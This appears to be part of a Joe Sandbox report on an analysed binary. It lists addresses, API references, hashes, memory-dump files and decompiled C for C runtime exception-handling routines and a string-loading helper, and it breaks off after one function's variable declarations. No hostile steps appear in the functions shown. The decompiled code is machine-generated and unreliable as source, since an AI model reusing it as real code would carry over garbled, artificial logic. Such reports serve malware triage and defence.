0x00000000
0x004149f5
0x004149f9
0x00000000
0x00000000
0x004149ff
0x00414a02
0x00414a05
0x00000000
0x00000000
0x00414a07
0x00414a0b
0x00000000
0x00000000
0x00414a11
0x00414a14
0x00414a17
0x00000000
0x00000000
0x00414a19
0x00414a1d
0x00000000
0x00000000
0x00414a23
0x00414a29
0x00414a2c
0x00000000
0x00000000
0x00414a2e
0x00414a35
0x00000000
0x00000000
0x00414a37
0x00000000
0x00414921
0x00414907
0x00000000
0x00414907
0x004148e2
0x00000000
0x004148e2
0x004148c7
0x004148ca
0x00000000
0x00000000
0x00000000
0x004148ca
0x004147a4
0x00414727
0x0041472e
0x00414733
0x00414739
0x00000000
0x00414739
0x00414729
0x0041472c
0x00000000
0x00000000
0x00000000

APIs

__aulldvrm.LIBCMT ref: 00414ADE

Strings

:, xrefs: 004147C3
p, xrefs: 00414855
f, xrefs: 00414808
p, xrefs: 004147F3
f, xrefs: 0041484E
f, xrefs: 004147EC
p, xrefs: 0041480F

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: __aulldvrm
String ID: :$f$f$f$p$p$p
API String ID: 1302938615-1434680307
Opcode ID: f527e4f792748c4c81ea398798b4fd104335ec63243895d6d90216d23a68bb42
Instruction ID: 607a31bd4ea81ff45c915c0f1c4c23fb0c017dfe2e9da3a41f01910250a4c6a4
Opcode Fuzzy Hash: f527e4f792748c4c81ea398798b4fd104335ec63243895d6d90216d23a68bb42
Instruction Fuzzy Hash: B602FF75E001188ADF309FA5D6846EEB7B2FF82B14FA54217D4247B284D3389EC98B5D

Uniqueness

Uniqueness Score: -1.00%

Function 004121BF Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E004121BF(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t201;
				signed int _t202;
				char _t203;
				signed int _t205;
				signed int _t207;
				signed char* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t214;
				void* _t217;
				signed char* _t220;
				void* _t222;
				void* _t224;
				signed char _t228;
				signed int _t229;
				void* _t231;
				void* _t234;
				void* _t237;
				signed int _t247;
				void* _t250;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr _t253;
				signed int _t254;
				void* _t259;
				void* _t264;
				void* _t265;
				signed int _t269;
				signed char* _t270;
				intOrPtr* _t271;
				signed char _t272;
				signed int _t273;
				signed int _t274;
				intOrPtr* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t283;
				signed int _t290;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed char* _t297;
				signed int _t298;
				signed char _t299;
				signed int* _t301;
				signed char* _t304;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t327;
				void* _t329;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;

				_t296 = __edx;
				_push(_t315);
				_t301 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t275 = E00412FCD(_a8, _a16, _t301);
				_t332 = _t331 + 0xc;
				_v12 = _t275;
				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
					L67:
					_t201 = E0042B9D6(_t270, _t275, _t296, _t301, _t315);
					asm("int3");
					_t329 = _t332;
					_t333 = _t332 - 0x38;
					_push(_t270);
					_t271 = _v112;
					__eflags =  *_t271 - 0x80000003;
					if( *_t271 == 0x80000003) {
						return _t201;
					} else {
						_push(_t315);
						_push(_t301);
						_t202 = E0040A321(_t271, _t275, _t296, _t301, _t315);
						__eflags =  *(_t202 + 8);
						if( *(_t202 + 8) != 0) {
							__imp__EncodePointer(0);
							_t315 = _t202;
							_t222 = E0040A321(_t271, _t275, _t296, 0, _t315);
							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
								__eflags =  *_t271 - 0xe0434f4d;
								if( *_t271 != 0xe0434f4d) {
									__eflags =  *_t271 - 0xe0434352;
									if( *_t271 != 0xe0434352) {
										_t214 = E00411BEE(_t296, 0, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
										_t333 = _t333 + 0x1c;
										__eflags = _t214;
										if(_t214 != 0) {
											L84:
											return _t214;
										}
									}
								}
							}
						}
						_t203 = _a16;
						_v28 = _t203;
						_v24 = 0;
						__eflags =  *(_t203 + 0xc);
						if( *(_t203 + 0xc) > 0) {
							_push(_a24);
							E00411B21(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
							_t298 = _v40;
							_t334 = _t333 + 0x18;
							_t214 = _v44;
							_v20 = _t214;
							_v12 = _t298;
							__eflags = _t298 - _v32;
							if(_t298 >= _v32) {
								goto L84;
							}
							_t277 = _t298 * 0x14;
							__eflags = _t277;
							_v16 = _t277;
							do {
								_t278 = 5;
								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
								_t334 = _t334 + 0xc;
								__eflags = _v64 - _t217;
								if(_v64 > _t217) {
									goto L83;
								}
								__eflags = _t217 - _v60;
								if(_t217 > _v60) {
									goto L83;
								}
								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t283 = _t220[4];
								__eflags = _t283;
								if(_t283 == 0) {
									L81:
									__eflags =  *_t220 & 0x00000040;
									if(( *_t220 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E0041213F(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
										_t298 = _v12;
										_t334 = _t334 + 0x30;
									}
									goto L83;
								}
								__eflags =  *((char*)(_t283 + 8));
								if( *((char*)(_t283 + 8)) != 0) {
									goto L83;
								}
								goto L81;
								L83:
								_t298 = _t298 + 1;
								_t214 = _v20;
								_t277 = _v16 + 0x14;
								_v12 = _t298;
								_v16 = _t277;
								__eflags = _t298 - _v32;
							} while (_t298 < _v32);
							goto L84;
						}
						E0042B9D6(_t271, _t275, _t296, 0, _t315);
						asm("int3");
						_push(_t329);
						_t297 = _v184;
						_push(_t271);
						_push(_t315);
						_push(0);
						_t205 = _t297[4];
						__eflags = _t205;
						if(_t205 == 0) {
							L109:
							_t207 = 1;
							__eflags = 1;
						} else {
							_t276 = _t205 + 8;
							__eflags =  *_t276;
							if( *_t276 == 0) {
								goto L109;
							} else {
								__eflags =  *_t297 & 0x00000080;
								_t304 = _v0;
								if(( *_t297 & 0x00000080) == 0) {
									L91:
									_t272 = _t304[4];
									_t317 = 0;
									__eflags = _t205 - _t272;
									if(_t205 == _t272) {
										L101:
										__eflags =  *_t304 & 0x00000002;
										if(( *_t304 & 0x00000002) == 0) {
											L103:
											_t208 = _a4;
											__eflags =  *_t208 & 0x00000001;
											if(( *_t208 & 0x00000001) == 0) {
												L105:
												__eflags =  *_t208 & 0x00000002;
												if(( *_t208 & 0x00000002) == 0) {
													L107:
													_t317 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t297 & 0x00000002;
													if(( *_t297 & 0x00000002) != 0) {
														goto L107;
													}
												}
											} else {
												__eflags =  *_t297 & 0x00000001;
												if(( *_t297 & 0x00000001) != 0) {
													goto L105;
												}
											}
										} else {
											__eflags =  *_t297 & 0x00000008;
											if(( *_t297 & 0x00000008) != 0) {
												goto L103;
											}
										}
										_t207 = _t317;
									} else {
										_t184 = _t272 + 8; // 0x6e
										_t209 = _t184;
										while(1) {
											_t273 =  *_t276;
											__eflags = _t273 -  *_t209;
											if(_t273 !=  *_t209) {
												break;
											}
											__eflags = _t273;
											if(_t273 == 0) {
												L97:
												_t210 = _t317;
											} else {
												_t274 =  *((intOrPtr*)(_t276 + 1));
												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
													break;
												} else {
													_t276 = _t276 + 2;
													_t209 = _t209 + 2;
													__eflags = _t274;
													if(_t274 != 0) {
														continue;
													} else {
														goto L97;
													}
												}
											}
											L99:
											__eflags = _t210;
											if(_t210 == 0) {
												goto L101;
											} else {
												_t207 = 0;
											}
											goto L110;
										}
										asm("sbb eax, eax");
										_t210 = _t209 | 0x00000001;
										__eflags = _t210;
										goto L99;
									}
								} else {
									__eflags =  *_t304 & 0x00000010;
									if(( *_t304 & 0x00000010) != 0) {
										goto L109;
									} else {
										goto L91;
									}
								}
							}
						}
						L110:
						return _t207;
					}
				} else {
					_t270 = _a4;
					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
						L22:
						_t296 = _a12;
						_v8 = _t296;
						goto L24;
					} else {
						_t315 = 0;
						if(_t270[0x1c] != 0) {
							goto L22;
						} else {
							_t224 = E0040A321(_t270, _t275, _t296, _t301, 0);
							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
								L61:
								return _t224;
							} else {
								_t270 =  *(E0040A321(_t270, _t275, _t296, _t301, 0) + 0x10);
								_t259 = E0040A321(_t270, _t275, _t296, _t301, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t259 + 0x14));
								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E0040A321(_t270, _t275, _t296, _t301, _t315) + 0x1c)) == _t315) {
										L23:
										_t296 = _v8;
										_t275 = _v12;
										L24:
										_v52 = _t301;
										_v48 = 0;
										__eflags =  *_t270 - 0xe06d7363;
										if( *_t270 != 0xe06d7363) {
											L57:
											__eflags = _t301[3];
											if(_t301[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t275);
													_push(_t301);
													_push(_a16);
													_push(_t296);
													_push(_a8);
													_push(_t270);
													L68();
													_t332 = _t332 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags = _t270[0x10] - 3;
											if(_t270[0x10] != 3) {
												goto L57;
											} else {
												__eflags = _t270[0x14] - 0x19930520;
												if(_t270[0x14] == 0x19930520) {
													L29:
													_t315 = _a32;
													__eflags = _t301[3];
													if(_t301[3] > 0) {
														_push(_a28);
														E00411B21(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
														_t296 = _v64;
														_t332 = _t332 + 0x18;
														_t247 = _v68;
														_v44 = _t247;
														_v16 = _t296;
														__eflags = _t296 - _v56;
														if(_t296 < _v56) {
															_t290 = _t296 * 0x14;
															__eflags = _t290;
															_v32 = _t290;
															do {
																_t291 = 5;
																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
																_t332 = _t332 + 0xc;
																__eflags = _v104 - _t250;
																if(_v104 <= _t250) {
																	__eflags = _t250 - _v100;
																	if(_t250 <= _v100) {
																		_t294 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t299 = _t270[0x1c];
																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
																			_t252 = _t251 + 4;
																			__eflags = _t252;
																			_v36 = _t252;
																			_t253 = _v88;
																			_v40 =  *_t251;
																			_v24 = _t253;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t327 = _v40;
																				_t314 = _v36;
																				__eflags = _t327;
																				if(_t327 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t299);
																						_push( *_t314);
																						_t254 =  &_v84;
																						_push(_t254);
																						L87();
																						_t332 = _t332 + 0xc;
																						__eflags = _t254;
																						if(_t254 != 0) {
																							break;
																						}
																						_t299 = _t270[0x1c];
																						_t327 = _t327 - 1;
																						_t314 = _t314 + 4;
																						__eflags = _t327;
																						if(_t327 > 0) {
																							continue;
																						} else {
																							_t294 = _v20;
																							_t253 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E0041213F(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
																					_t332 = _t332 + 0x30;
																				}
																				L43:
																				_t296 = _v16;
																				goto L44;
																				L40:
																				_t294 = _t294 + 1;
																				_t253 = _t253 + 0x10;
																				_v20 = _t294;
																				_v24 = _t253;
																				__eflags = _t294 - _v92;
																			} while (_t294 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t296 = _t296 + 1;
																_t247 = _v44;
																_t290 = _v32 + 0x14;
																_v16 = _t296;
																_v32 = _t290;
																__eflags = _t296 - _v56;
															} while (_t296 < _v56);
															_t301 = _a20;
															_t315 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E00409D3A(_t270, _t301, _t315, __eflags);
														_t275 = _t270;
													}
													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
													if(( *_t301 & 0x1fffffff) < 0x19930521) {
														L60:
														_t224 = E0040A321(_t270, _t275, _t296, _t301, _t315);
														__eflags =  *(_t224 + 0x1c);
														if( *(_t224 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t228 = _t301[8] >> 2;
														__eflags = _t301[7];
														if(_t301[7] != 0) {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																_push(_t301[7]);
																_t229 = E00412D77(_t270);
																_pop(_t275);
																__eflags = _t229;
																if(_t229 == 0) {
																	goto L64;
																} else {
																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *(E0040A321(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
																	_t237 = E0040A321(_t270, _t275, _t296, _t301, _t315);
																	_t286 = _v8;
																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags = _t270[0x14] - 0x19930521;
													if(_t270[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t270[0x14] - 0x19930522;
														if(_t270[0x14] != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E0040A321(_t270, _t275, _t296, _t301, _t315) + 0x1c));
										_t264 = E0040A321(_t270, _t275, _t296, _t301, _t315);
										_push(_v16);
										 *(_t264 + 0x1c) = _t315;
										_t265 = E00412D77(_t270);
										_pop(_t286);
										if(_t265 != 0) {
											goto L23;
										} else {
											_t301 = _v16;
											_t353 =  *_t301 - _t315;
											if( *_t301 <= _t315) {
												L62:
												E0042B5DA(_t270, _t286, _t296, _t301, _t315, __eflags);
											} else {
												while(1) {
													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
													if(E0041291A( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0x454b2c) != 0) {
														goto L63;
													}
													_t315 = _t315 + 0x10;
													_t269 = _v20 + 1;
													_v20 = _t269;
													_t353 = _t269 -  *_t301;
													if(_t269 >=  *_t301) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t270);
											E00409D3A(_t270, _t301, _t315, __eflags);
											_t275 =  &_v64;
											E00412870( &_v64);
											E004130CF( &_v64, 0x45114c);
											L64:
											 *(E0040A321(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
											_t231 = E0040A321(_t270, _t275, _t296, _t301, _t315);
											_t275 = _v8;
											 *(_t231 + 0x14) = _v8;
											__eflags = _t315;
											if(_t315 == 0) {
												_t315 = _a8;
											}
											E00411D14(_t275, _t315, _t270);
											E00412C6C(_a8, _a16, _t301);
											_t234 = E00412E97(_t301);
											_t332 = _t332 + 0x10;
											_push(_t234);
											E00412BE3(_t270, _t275, _t296, _t301, _t315, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}

0x004121bf
0x004121c6
0x004121c8
0x004121d1
0x004121d7
0x004121df
0x004121e1
0x004121e4
0x004121ea
0x0041255e
0x0041255e
0x00412563
0x00412565
0x00412567
0x0041256a
0x0041256b
0x0041256e
0x00412574
0x00412693
0x0041257a
0x0041257a
0x0041257b
0x0041257c
0x00412583
0x00412586
0x00412589
0x0041258f
0x00412591
0x00412596
0x00412599
0x0041259b
0x004125a1
0x004125a3
0x004125a9
0x004125be
0x004125c3
0x004125c6
0x004125c8
0x0041268f
0x00000000
0x00412690
0x004125c8
0x004125a9
0x004125a1
0x00412599
0x004125ce
0x004125d1
0x004125d4
0x004125d7
0x004125da
0x004125e0
0x004125f2
0x004125f7
0x004125fa
0x004125fd
0x00412600
0x00412603
0x00412606
0x00412609
0x00000000
0x00000000
0x0041260f
0x0041260f
0x00412612
0x00412615
0x00412624
0x00412625
0x00412625
0x00412627
0x0041262a
0x00000000
0x00000000
0x0041262c
0x0041262f
0x00000000
0x00000000
0x0041263d
0x0041263f
0x00412642
0x00412644
0x0041264c
0x0041264c
0x0041264f
0x00412651
0x00412653
0x0041266f
0x00412674
0x00412677
0x00412677
0x00000000
0x0041264f
0x00412646
0x0041264a
0x00000000
0x00000000
0x00000000
0x0041267a
0x0041267d
0x0041267e
0x00412681
0x00412684
0x00412687
0x0041268a
0x0041268a
0x00000000
0x00412615
0x00412694
0x00412699
0x0041269a
0x0041269d
0x004126a0
0x004126a1
0x004126a2
0x004126a3
0x004126a6
0x004126a8
0x00412720
0x00412722
0x00412722
0x004126aa
0x004126aa
0x004126ad
0x004126b0
0x00000000
0x004126b2
0x004126b2
0x004126b5
0x004126b8
0x004126bf
0x004126bf
0x004126c2
0x004126c4
0x004126c6
0x004126f8
0x004126f8
0x004126fb
0x00412702
0x00412702
0x00412705
0x00412708
0x0041270f
0x0041270f
0x00412712
0x00412719
0x0041271b
0x0041271b
0x00412714
0x00412714
0x00412717
0x00000000
0x00000000
0x00412717
0x0041270a
0x0041270a
0x0041270d
0x00000000
0x00000000
0x0041270d
0x004126fd
0x004126fd
0x00412700
0x00000000
0x00000000
0x00412700
0x0041271c
0x004126c8
0x004126c8
0x004126c8
0x004126cb
0x004126cb
0x004126cd
0x004126cf
0x00000000
0x00000000
0x004126d1
0x004126d3
0x004126e7
0x004126e7
0x004126d5
0x004126d5
0x004126d8
0x004126db
0x00000000
0x004126dd
0x004126dd
0x004126e0
0x004126e3
0x004126e5
0x00000000
0x00000000
0x00000000
0x00000000
0x004126e5
0x004126db
0x004126f0
0x004126f0
0x004126f2
0x00000000
0x004126f4
0x004126f4
0x004126f4
0x00000000
0x004126f2
0x004126eb
0x004126ed
0x004126ed
0x00000000
0x004126ed
0x004126ba
0x004126ba
0x004126bd
0x00000000
0x00000000
0x00000000
0x00000000
0x004126bd
0x004126b8
0x004126b0
0x00412723
0x00412727
0x00412727
0x004121f9
0x004121f9
0x00412202
0x004122ff
0x004122ff
0x00412302
0x00000000
0x00412231
0x00412231
0x00412236
0x00000000
0x0041223c
0x0041223c
0x00412244
0x004124f8
0x004124fc
0x0041224a
0x0041224f
0x00412252
0x00412257
0x0041225e
0x00412263
0x00000000
0x0041229b
0x004122a3
0x00412307
0x00412307
0x0041230a
0x0041230d
0x0041230f
0x00412312
0x00412315
0x0041231b
0x004124c7
0x004124c7
0x004124ca
0x00000000
0x004124cc
0x004124cc
0x004124cf
0x00000000
0x004124d5
0x004124d5
0x004124d8
0x004124db
0x004124dc
0x004124dd
0x004124e0
0x004124e1
0x004124e4
0x004124e5
0x004124ea
0x00000000
0x004124ea
0x004124cf
0x00412321
0x00412321
0x00412325
0x00000000
0x0041232b
0x0041232b
0x00412332
0x0041234a
0x0041234a
0x0041234d
0x00412350
0x00412356
0x00412366
0x0041236b
0x0041236e
0x00412371
0x00412374
0x00412377
0x0041237a
0x0041237d
0x00412383
0x00412383
0x00412386
0x00412389
0x00412398
0x00412399
0x00412399
0x0041239b
0x0041239e
0x004123a4
0x004123a7
0x004123ad
0x004123af
0x004123b2
0x004123b5
0x004123bb
0x004123be
0x004123c3
0x004123c3
0x004123c6
0x004123c9
0x004123cc
0x004123cf
0x004123d2
0x004123d7
0x004123d8
0x004123d9
0x004123da
0x004123db
0x004123de
0x004123e1
0x004123e3
0x00000000
0x004123e5
0x004123e5
0x004123e5
0x004123e6
0x004123e8
0x004123eb
0x004123ec
0x004123f1
0x004123f4
0x004123f6
0x00000000
0x00000000
0x004123f8
0x004123fb
0x004123fc
0x004123ff
0x00412401
0x00000000
0x00412403
0x00412403
0x00412406
0x00000000
0x00412406
0x00000000
0x00412401
0x0041241a
0x00412420
0x0041243d
0x00412442
0x00412442
0x00412445
0x00412445
0x00000000
0x00412409
0x00412409
0x0041240a
0x0041240d
0x00412410
0x00412413
0x00412413
0x00000000
0x00412418
0x004123b5
0x004123a7
0x00412448
0x0041244b
0x0041244c
0x0041244f
0x00412452
0x00412455
0x00412458
0x00412458
0x00412461
0x00412464
0x00412464
0x0041237d
0x00412467
0x0041246b
0x0041246d
0x00412470
0x00412476
0x00412476
0x0041247e
0x00412483
0x004124ed
0x004124ed
0x004124f2
0x004124f6
0x00000000
0x00000000
0x00000000
0x00000000
0x00412485
0x00412488
0x0041248b
0x0041248f
0x0041249d
0x0041249f
0x004124b6
0x004124ba
0x004124c0
0x004124c1
0x004124c3
0x00000000
0x004124c5
0x00000000
0x004124c5
0x00000000
0x00000000
0x00000000
0x00412491
0x00412491
0x00412493
0x00000000
0x00412495
0x00412495
0x00412499
0x00000000
0x0041249b
0x004124a1
0x004124a6
0x004124a9
0x004124ae
0x004124b1
0x00000000
0x004124b1
0x00412499
0x00412493
0x0041248f
0x00412334
0x00412334
0x0041233b
0x00000000
0x0041233d
0x0041233d
0x00412344
0x00000000
0x00000000
0x00000000
0x00000000
0x00412344
0x0041233b
0x00412332
0x00412325
0x004122a5
0x004122ad
0x004122b0
0x004122b5
0x004122b9
0x004122bc
0x004122c2
0x004122c5
0x00000000
0x004122c7
0x004122c7
0x004122ca
0x004122cc
0x004124fd
0x004124fd
0x00000000
0x004122d2
0x004122da
0x004122e5
0x00000000
0x00000000
0x004122ee
0x004122f1
0x004122f2
0x004122f5
0x004122f7
0x00000000
0x004122fd
0x00000000
0x004122fd
0x00000000
0x004122f7
0x004122d2
0x00412502
0x00412502
0x00412504
0x00412505
0x0041250c
0x0041250f
0x0041251d
0x00412522
0x00412527
0x0041252a
0x0041252f
0x00412532
0x00412535
0x00412537
0x00412539
0x00412539
0x0041253e
0x0041254a
0x00412550
0x00412555
0x00412558
0x00412559
0x00000000
0x00412559
0x004122c5
0x004122a3
0x00412263
0x00412244
0x00412236
0x00412202

APIs

type_info::operator==.LIBVCRUNTIME ref: 004122DE
___TypeMatch.LIBVCRUNTIME ref: 004123EC
_UnwindNestedFrames.LIBCMT ref: 0041253E
CallUnexpected.LIBVCRUNTIME ref: 00412559

Strings

WB, xrefs: 0041254F
csm, xrefs: 00412315
csm, xrefs: 004121FC
csm, xrefs: 00412269

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: WB$csm$csm$csm
API String ID: 2751267872-715047601
Opcode ID: 02a70ca93da3d500440ecaaf464cbdbf573985a973a46190d05f839772729be5
Instruction ID: f81d3080d8a04a68c72987ecf927ef7d26efb8bc1a2847883c616b2a6fcba8ce
Opcode Fuzzy Hash: 02a70ca93da3d500440ecaaf464cbdbf573985a973a46190d05f839772729be5
Instruction Fuzzy Hash: 21B19E71800219EFCF15DFA5DA809EFB7B5FF14314B14415BE810AB252D3B8DAA1CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004011B0 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41
stringCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004011B0(int __eax, int _a4) {
				signed char* _v8;
				WCHAR* _v12;
				signed char* _t12;
				signed char* _t16;
				void* _t21;

				0x400000(0x454c58);
				if(LoadStringW(GetModuleHandleW(0), _a4, 0x454c58, __eax) == 0) {
					do {
						_t16 =  *0x4494a8; // 0x4533bc
						if(( *_t16 & 1) != 0) {
							_t12 =  *0x4494a8; // 0x4533bc
							_v8 = _t12;
							_v12 = 0;
							E00406000(_v12, _v8, "WCMD_LoadMessage", "LoadString failed with %ld\n", GetLastError());
							_t21 = _t21 + 0x14;
						}
					} while (0 != 0);
					lstrcpyW(0x454c58, L"Failed!");
				}
				return 0x454c58;
			}

0x004011bb
0x004011db
0x004011dd
0x004011dd
0x004011e9
0x004011eb
0x004011f0
0x004011f3
0x00401213
0x00401218
0x00401218
0x0040121b
0x00401229
0x00401229
0x00401237

APIs

GetModuleHandleW.KERNEL32(00000000,?,00454C58,00000000), ref: 004011CC
LoadStringW.USER32(00000000), ref: 004011D3
GetLastError.KERNEL32 ref: 004011FA
lstrcpyW.KERNEL32 ref: 00401229

Strings

Failed!, xrefs: 0040121F
LoadString failed with %ld, xrefs: 00401201
WCMD_LoadMessage, xrefs: 00401206
XLE, xrefs: 0040122F

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ErrorHandleLastLoadModuleStringlstrcpy
String ID: Failed!$LoadString failed with %ld$WCMD_LoadMessage$XLE
API String ID: 1619479478-3264748446
Opcode ID: f3c5694f10ffe692d1a8ff8f5b17a50bbe3d44e24cfc06591587535780707aaf
Instruction ID: 1905729fbaad105e2efb8f31e7842406a45c6b4416b5eaa5507a0bb910886e27
Opcode Fuzzy Hash: f3c5694f10ffe692d1a8ff8f5b17a50bbe3d44e24cfc06591587535780707aaf
Instruction Fuzzy Hash: C401A2B56442047BC700EBE4EC06B6F3A78AB85707F11406AFD05A6392D6799D14977C

Uniqueness

Uniqueness Score: -1.00%

Function 00440E9D Relevance: 13.8, APIs: 9, Instructions: 301
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00440E9D(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
